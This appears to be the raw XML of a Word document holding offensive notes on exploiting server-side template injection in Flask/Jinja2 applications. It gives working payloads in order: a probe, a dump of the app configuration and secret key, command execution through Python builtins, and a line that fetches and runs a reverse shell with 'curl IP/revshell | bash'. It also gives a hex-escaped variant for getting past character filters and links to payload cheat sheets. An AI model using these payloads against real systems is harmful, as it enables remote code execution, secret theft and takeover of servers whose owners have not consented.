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highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is flask:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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Flask is a micro web framework written in Python. It is classified as a microframework because it does not require particular tools or libraries. It has no database abstraction layer, form validation, or any other components where pre-existing third-party l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ibraries provide common functions. However, Flask supports extensions that can add application features as if they were implemented in Flask itself</w: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What is SSTI:</w:t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Server-Side Template Injection is possible when an attacker injects template directive as user input that can execute arbitrary code on the server. If you happen to view the source of a web page and see below code snippets then it is safe to guess that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">application is using some template engine to render data.</w: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r/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When you have a Flask application 9/10 times is a SSTI exploit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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How to execute SSTI —&gt; RCE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="602"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Test for SSTI: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">type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yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ 7* 7 }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a search/form and if server respond with 49 then SSTI is possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://IP/no_filter?payload={{7*7}}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02"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Get Flask Config:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">{{config}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a search/form and you should get the current flask configration residient in </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flask.config like secret key etc.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709" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://IP/no_filter?payload={{config}}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b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute a command(ex: id):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}</w:t>
      </w:r>
      <w:r>
        <w:rPr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in a search/form and you should get the id result.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8"/>
        <w:spacing w:before="0" w:after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Ex:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://IP/no_filter?payload=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{{request.application.__globals__.__built</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ins__.__import__('os').popen('id').read()}}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after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ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:i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iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">In python code this will translate to:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:i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iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:i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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">os.popen('id')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after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ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:spacing w:before="0" w:after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000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload and run a Shell: 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highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none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highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">{{request.application.__globals__.__builtins__.__import__('os').popen('curl IP/revshell | bash').read()}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="2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in a search/form and you should get the ireverse shell uploaded and run in bash..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs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ind w:left="0" w:right="0" w:firstLine="708"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New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  <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://IP/no_filter?payload=</w:t>
      </w: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  <w:t xml:space="preserve">{{request.application.__globals__.__built</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ins__.__import__('os').popen('curl IP/revshell | bash').read()}}</w:t>
      </w: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  <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/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b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">*Bypass filtering*:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the application filters out some special carachters you can use this guide: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md#jinja2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="173"/>
            <w:highlight w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="173"/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="173"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr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highlight w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Ex.(follow RCE from step 5): </w:t>
      </w:r>
      <w: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f</w:t>
        <w:tab/>
        <w:t xml:space="preserve">\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">)("curl IP:PORT/revshell | bash")|attr("read")()}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr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ind w:left="709"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709"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709"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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Cheatsheet: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti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swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md#jinja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2022-11-16T12:12:49Z</dcterms:modified>
</cp:coreProperties>
</file>